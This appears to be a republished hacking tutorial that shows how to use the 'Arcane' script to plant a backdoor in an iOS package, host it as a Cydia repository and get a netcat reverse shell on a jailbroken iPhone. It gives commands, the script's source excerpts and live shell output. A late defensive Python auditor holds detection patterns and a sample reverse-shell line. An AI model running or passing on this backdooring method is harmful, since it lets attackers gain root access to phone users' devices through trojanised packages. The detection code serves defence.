How to Embed a Payload in an iPhone Package Using Arcane

Category: Mobile Security

0x00: Preface

    A common misconception is that iPhones are immune to cyberattacks and "more secure" than Android. And when an iPhone really is hacked, it is almost impossible to tell that it happened.

    Vulnerabilities in iOS are common, and Apple tries to address them with every security update it releases. First, consider all the CVEs disclosed last year. By our count, Apple has released more than 180 patches so far in 2020, and there are likely more that went unreported.


0x01: How Are iPhones Hacked?

    The jailbreaks released over the past decade have used a wide range of iOS vulnerabilities. Government agencies use undisclosed vulnerabilities to compromise iPhones every day. Exploit acquisition platforms such as Zerodium offer up to $2 million for private iOS vulnerability disclosures.

    That said, this article will not demonstrate a convenient magic button for accessing anyone's iPhone. It will give readers an understanding of how remote access to an iPhone is possible, and why using jailbreak repositories is dangerous.


0x02: Don't Miss: How to Get Started Hacking macOS Computers

Step 1: Jailbreak the iPhone

    To follow this guide, a jailbroken iOS device is required. I tested this attack against an iPhone 7 Plus running iOS 13.4.1 and an iPhone 7 running iOS 13.5. The iOS devices were jailbroken with the unc0ver method. You can also try other jailbreaks, such as checkra1n.

More info: How to Jailbreak iOS 12 to iOS 13.5 with Unc0ver or Chimera

Step 2: Clone the Arcane Repository

    Arcane is a simple automation script designed to backdoor iOS packages and create the resources needed to host a Cydia repository. I created Arcane for this article to make the process quick and accessible to beginners. Before cloning the repository, make sure the required dependencies are installed and up to date.

~$ sudo apt-get update && sudo apt-get install -Vy bzip2 netcat-traditional dpkg coreutils git python3
[sudo] password for kali:
Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 Packages [16.7 MB]
Get:3 http://kali.download/kali kali-rolling/non-free amd64 Packages [197 kB]
Get:4 http://kali.download/kali kali-rolling/contrib amd64 Packages [96.4 kB]
Fetched 17.0 MB in 4s (3,928 kB/s)
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
coreutils is already the newest version (8.30-3+b1).
dpkg is already the newest version (1.19.7kali1).
python3 is already the newest version (3.8.2-3).
python3 set to manually installed.
The following additional packages will be installed:
  git-man (1:2.27.0-1)
  libbz2-1.0 (1.0.8-3)
Suggested packages:
  bzip2-doc (1.0.8-3)
  git-daemon-run (1:2.27.0-1)
  | git-daemon-sysvinit (1:2.27.0-1)
  git-doc (1:2.27.0-1)
  git-el (1:2.27.0-1)
  git-email (1:2.27.0-1)
  git-gui (1:2.27.0-1)
  gitk (1:2.27.0-1)
  gitweb (1:2.27.0-1)
  git-cvs (1:2.27.0-1)
  git-mediawiki (1:2.27.0-1)
  git-svn (1:2.27.0-1)
The following packages will be upgraded:
  bzip2 (1.0.8-2 => 1.0.8-3)
  git (1:2.26.2-1 => 1:2.27.0-1)
  git-man (1:2.26.2-1 => 1:2.27.0-1)
  libbz2-1.0 (1.0.8-2 => 1.0.8-3)
  netcat-traditional (1.10-41.1+b1 => 1.10-45)
5 upgraded, 0 newly installed, 0 to remove and 767 not upgraded.
Need to get 8,643 kB of archives.
After this operation, 2,424 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 bzip2 amd64 1.0.8-3 [49.2 kB]
Get:2 http://kali.download/kali kali-rolling/main amd64 libbz2-1.0 amd64 1.0.8-3 [45.7 kB]
Get:3 http://kali.download/kali kali-rolling/main amd64 netcat-traditional amd64 1.10-45 [67.5 kB]
Get:4 http://kali.download/kali kali-rolling/main amd64 git amd64 1:2.27.0-1 [6,707 kB]
Get:5 http://kali.download/kali kali-rolling/main amd64 git-man all 1:2.27.0-1 [1,774 kB]
Fetched 8,643 kB in 2s (4,982 kB/s)
apt-listchanges: Reading changelogs...
(Reading database ... 287092 files and directories currently installed.)
Preparing to unpack .../bzip2_1.0.8-3_amd64.deb ...
Unpacking bzip2 (1.0.8-3) over (1.0.8-2) ...
Preparing to unpack .../libbz2-1.0_1.0.8-3_amd64.deb ...
Unpacking libbz2-1.0:amd64 (1.0.8-3) over (1.0.8-2) ...
Setting up libbz2-1.0:amd64 (1.0.8-3) ...
(Reading database ... 287092 files and directories currently installed.)
Preparing to unpack .../netcat-traditional_1.10-45_amd64.deb ...
Unpacking netcat-traditional (1.10-45) over (1.10-41.1+b1) ...
Preparing to unpack .../git_1%3a2.27.0-1_amd64.deb ...
Unpacking git (1:2.27.0-1) over (1:2.26.2-1) ...
Preparing to unpack .../git-man_1%3a2.27.0-1_all.deb ...
Unpacking git-man (1:2.27.0-1) over (1:2.26.2-1) ...
Setting up netcat-traditional (1.10-45) ...
Setting up bzip2 (1.0.8-3) ...
Setting up git-man (1:2.27.0-1) ...
Setting up git (1:2.27.0-1) ...
Processing triggers for libc-bin (2.30-4) ...
Processing triggers for man-db (2.9.1-1) ...
Processing triggers for kali-menu (2020.2.2) ...

Once that is done, clone the Arcane repository.

~$ sudo git clone https://github.com/tokyoneon/Arcane /opt/arcane

Cloning into '/opt/arcane'...
remote: Enumerating objects: 16, done.
remote: Counting objects: 100% (16/16), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 16 (delta 0), reused 16 (delta 0), pack-reused 0
Unpacking objects: 100% (16/16), 805.04 KiB | 2.95 MiB/s, done.

Recursively (-R) change the ownership so the files are accessible without root privileges.

~$ sudo chown $USER:$USER -R /opt/arcane/

Change into the new /opt/arcane directory.

~$ cd /opt/arcane/

Make the arcane.sh script executable so it can be run in Kali.

~/opt/arcane$ sudo chmod +x arcane.sh

To view the available options, run Arcane with the --help argument.

~/opt/arcane$ ./arcane.sh --help

[░] ./arcane.sh --input package.deb --lhost <attacker ip> --lport <1337>

-i, --input     iOS package to backdoor
-f, --file      file containing commands to exec (default: not required)
-h, --lhost     local ip address for nc listener
-p, --lport     local port for netcat listener (default: 1337)
-c, --cydia     generate resources for apt/cydia repository (default: disabled)
-n, --netcat    autostart netcat listener (default: disabled)
-u, --udp       enable udp (default: tcp)
-x, --noart     if you hate awesome ascii art (default: enabled)
    --help      you're looking at it

Step 3: Backdoor an iOS Package

The Arcane repository includes a "samples/" directory containing several packages compiled for the iOS architecture. Use the ls command to view the directory contents.

~/opt/arcane$ ls -la samples/

total 400
drwxr-xr-x 2 root root   4096 Aug  4 11:32 .
drwxr-xr-x 5 root root   4096 Aug  4 11:32 ..
-rw-r--r-- 1 root root 100748 Aug  4 11:32 libapt-pkg-dev_1.8.2.1-1_iphoneos-arm.deb
-rw-r--r-- 1 root root 142520 Aug  4 11:32 network-cmds_543-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  76688 Aug  4 11:32 sed_4.5-1_iphoneos-arm.deb
-rw-r--r-- 1 root root  60866 Aug  4 11:32 top_39-2_iphoneos-arm.deb
-rw-r--r-- 1 root root  13810 Aug  4 11:32 whois_5.3.2-1_iphoneos-arm.deb

    All of these packages were pulled from Bingner's official Cydia repository, and any of them can be used for the rest of the walkthrough. For a full list of available packages, view the repository contents with the following command.

~/opt/arcane$ wget -qO- 'https://apt.bingner.com/dists/ios/1443.00/main/binary-iphoneos-arm/Packages' | awk -v i='https://apt.bingner.com/' '/debs\//{print i $2}'

https://apt.bingner.com/debs/1443.00/3proxy_0.5.3k-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/adv-cmds_119-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/afpfs-ng_0.8.1-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/apr_1.6.3-4_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/apr-lib_1.6.3-1_iphoneos-arm.deb
...
https://apt.bingner.com/debs/1443.00/xt_1.1.5-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/xtrans_1.3.5-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/xz_5.2.4-4_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/zip_2.32-1_iphoneos-arm.deb
https://apt.bingner.com/debs/1443.00/zsh_5.7.1-3_iphoneos-arm.deb

    Simply wget the package of your choice. This walkthrough uses a package found in the "samples/" directory. Backdoor the package with the following arcane command.

~/opt/arcane$ ./arcane.sh --input samples/whois_5.3.2-1_iphoneos-arm.deb --lhost 172.16.16.1 --lport 20001 --cydia --netcat
░█████╗░██████╗░░█████╗░░█████╗░███╗░░██╗███████╗
██╔══██╗██╔══██╗██╔══██╗██╔══██╗████╗░██║██╔════╝
███████║██████╔╝██║░░╚═╝███████║██╔██╗██║█████╗░░
██╔══██║██╔══██╗██║░░██╗██╔══██║██║╚████║██╔══╝░░
██║░░██║██║░░██║╚█████╔╝██║░░██║██║░╚███║███████╗
╚═╝░░╚═╝╚═╝░░╚═╝░╚════╝░╚═╝░░╚═╝╚═╝░░╚══╝╚══════╝
v0.1 by @tokyoneon_


Below is a brief explanation of each argument; you can watch the GIF below to see the package being used.

--input: This argument defines the file path of the package to backdoor.

--lhost: The lhost (or local host) is the attacker's IP address and is a required argument. It tells the backdoored package where Kali is located on the network. In this case, my Kali system is at 172.16.16.1.

--lport: Defined here with an arbitrary value of 20001, the lport (or local port) tells the backdoored package which port the Netcat listener is on.

--cydia: This argument instructs Arcane to generate the files needed to host a Cydia repository.

--netcat: This argument tells Arcane to automatically start a Netcat listener with the given protocol and port.

Once it finishes, the Arcane terminal cannot be used, because the Netcat listener is waiting for an inbound connection.

Step 4: Host the Repository Resources

Open a new terminal in Kali and view the contents of the /tmp/cydia directory. Note the backdoored package.

~$ ls -la /tmp/cydia/

-rw-r--r-- 1 root root    29 Jul 29 14:44 index.html
-rw-r--r-- 1 root root   639 Jul 29 14:44 Packages
-rw-r--r-- 1 root root   494 Jul 29 14:44 Packages.bz2
-rw-r--r-- 1 root root   143 Jul 29 14:44 Release
-rw-r--r-- 1 root root 14064 Jul 29 14:44 whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb

Change into the directory and start a simple python3 server so the files are accessible to other devices on the same network (e.g., the iPhone).

~$ cd /tmp/cydia; sudo python3 -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Step 5: Add the Repository to Cydia

    Make sure the jailbroken iOS device and the Kali system are on the same Wi-Fi network. Then open the Cydia app and navigate to the "Sources" tab. Select the "Edit" button in the top-right corner, then the "Add" button in the top-left corner.

    When prompted for a URL, enter the IP address of the Kali system hosting the Python server. Be sure to remove the "s" from "https" in the URL, because Cydia tries to add it by default. Select "Add Source" to add it as a repository. Finally, select "Return to Cydia" to find the newly added repository.

Step 6: Install the Backdoored Package

Select the repository to find the backdoored package. Make sure the Arcane terminal is still listening in Kali, then select "Install" and "Confirm" in Cydia. Cydia will install the package and execute the embedded payload.

How Does Arcane Work?

    In the Arcane terminal, a successful execution produces an "arcane>" shell prompt. Use sw_vers and uname to view the operating system and kernel versions.

[░] /usr/bin/nc -v -l -p 20001
[░] starting netcat listener on port 20001 with tcp
listening on [any] 20001 ...
172.16.16.25: inverse host lookup failed: Unknown host
connect to [172.16.16.1] from (UNKNOWN) [172.16.16.25] 56050

arcane> sw_vers
ProductName:    iPhone OS
ProductVersion: 13.4.1
BuildVersion:   17E262

arcane> uname -a
Darwin iPhone 19.4.0 Darwin Kernel Version 19.4.0: Mon Feb 24 22:04:12 PST 2020; root:xnu-6153.102.3~1/RELEASE_ARM64_T8010 iPhone9,4 arm64 D111AP Darwin

arcane>

At this point, all kinds of post-exploitation attacks are possible, but let's talk about what Arcane actually did. A few things happened in the GIF shown in Step 3.

In Kali, unpack the whois package that was just installed on the iOS device.

~$ dpkg-deb -R /tmp/cydia/whois_5.3.2-1_iphoneos-arm_BACKDOORED.deb /tmp/whois-decomp

Use tree to view the directory contents. Note the "DEBIAN" directory containing the "control" and "postinst" files. Both files matter for how Cydia indexes the package and how commands are executed during installation.

~$ tree /tmp/whois-decomp/

/tmp/whois-decomp/
├── DEBIAN
│   ├── control
│   └── postinst
└── usr
    └── bin
        └── whois

The "control" file (also called "control data") contains values used by package management tools such as dpkg when the package is installed. Arcane either modifies an existing control file or creates one.

# The "control" file template. Most iOS packages will include a
# control file. In the event one is not found, Arcane will use the
# below template. The `$hacker` variable is used here to occupy
# various arbitrary fields.
# https://www.debian.org/doc/manuals/maint-guide/dreq.en.html
controlTemp="Package: com.$hacker.backdoor
Name: $hacker backdoor
Version: 1337
Section: app
Architecture: iphoneos-arm
Description: A backdoored iOS package
Author: $hacker <https://$hacker.github.io/>
Maintainer: $hacker <https://$hacker.github.io/>";

...

# An `if` statement to check for the control file.
if [[ ! -f "$tmp/DEBIAN/control" ]]; then
  # If no control is detected, create it using the template.
  echo "$controlTemp" > "$tmp/DEBIAN/control";
  status "created control file" "error with control template";
else
  # If a control file exists, Arcane will simply rename the package
  # as it appears in the list of available Cydia applications. This
  # makes the package easier to locate in Cydia.
  msg "detected control file" succ;
  sed -i '0,/^Name:.*/s//Name: $hacker backdoor/' "$tmp/DEBIAN/control";
  status "modified control file" "error with control";
fi;

    Scripts can be shipped as part of a package to run when an application is installed, upgraded, or removed. The package maintainer scripts are the preinst, postinst, prerm, and postrm files. Arcane uses the "postinst" file to execute commands during installation.

# The "post-installation" file. This file is generally responsible
# for executing commands on the OS after installing the required
# files. It's utilized by developers to manage and maintain various
# aspects of an installation. Arcane abuses this functionality by
# appending malicious Bash commands to the bottom of the file.
postinst="$tmp/DEBIAN/postinst";

# A function to handle the type of command execution embedded into the
# postinst file.
function inject_backdoor (){
  # If --file is used, `cat` the command(s) into the postinst file.
  if [[ "$infile" ]]; then
    cat "$infile" >> "$postinst";
    embed="[$infile]";
  else
    # If no --file, utilize the simple Bash payload, previously
    # defined.
    echo -e "$payload" >> "$postinst";
    embed="generic shell command";
  fi;
  status "embedded $embed into postinst" "error embedding backdoor";
  chmod 0755 "$postinst"
};

Readers are encouraged to review the Arcane source to better understand the underlying commands.
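As an added example, not from the article or the Arcane project: a small Python auditor that checks the maintainer scripts of an unpacked package (the DEBIAN/ directory that `dpkg-deb -R` produces, as in the step above) for the kind of appended shell payload described here, which is the check a defender would run on a package from a third-party Cydia repository before installing it. The SAMPLE_POSTINST text and the 192.0.2.10 address are constructed, and the patterns are heuristics rather than a complete list.

```python
"""Audit the maintainer scripts of an unpacked .deb for appended shell payloads."""
import re
from pathlib import Path

# Scripts dpkg (and therefore Cydia) run as root during install, upgrade and removal.
MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")

# Indicators of a reverse/bind shell or fetch-and-run line appended to a
# maintainer script. Heuristic patterns, not an exhaustive list.
SUSPICIOUS = {
    "netcat_exec": re.compile(r"\b(nc|ncat|netcat)\b.*\s-[ec]\b"),
    "dev_tcp": re.compile(r"/dev/(tcp|udp)/"),
    "fetch_exec": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "interactive_shell": re.compile(r"\b(ba)?sh\s+-i\b"),
    "decode_exec": re.compile(r"base64\s+(-d|--decode).*\|\s*(ba)?sh\b"),
}


def scan_script(name: str, text: str) -> list:
    """Return one finding per (line, rule) hit, skipping blank and comment lines."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for rule, pattern in SUSPICIOUS.items():
            if pattern.search(stripped):
                findings.append({"script": name, "line": lineno, "rule": rule, "text": stripped})
    return findings


def scan_package_dir(root: str) -> list:
    """Scan DEBIAN/* maintainer scripts in a tree produced by `dpkg-deb -R pkg.deb root`."""
    debian = Path(root) / "DEBIAN"
    findings = []
    for name in MAINTAINER_SCRIPTS:
        script = debian / name
        if script.is_file():
            findings.extend(scan_script(name, script.read_text(errors="replace")))
    return findings


# Constructed sample: a benign postinst with one appended reverse-shell line.
SAMPLE_POSTINST = """#!/bin/bash
# routine housekeeping a real package might do
ldconfig 2>/dev/null || true
nohup bash -i >& /dev/tcp/192.0.2.10/20001 0>&1 &
"""

if __name__ == "__main__":
    for f in scan_script("postinst", SAMPLE_POSTINST):
        print(f"{f['script']}:{f['line']} [{f['rule']}] {f['text']}")
```

Run `scan_package_dir("/tmp/whois-decomp")` against the tree unpacked earlier to apply the same rules to a real package; an empty result means none of the patterns matched, not that the scripts are safe.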


0x03: iOS Post-Exploitation

    Apple's iOS and macOS are similar; both operating systems are derivatives of FreeBSD, and there is overlap in how the systems are set up, such as launchctl, the keychain, and the file system structure.

This article was originally published on the WeChat public account 洛米唯熊: How to Embed a Payload in an iPhone Package Using Arcane
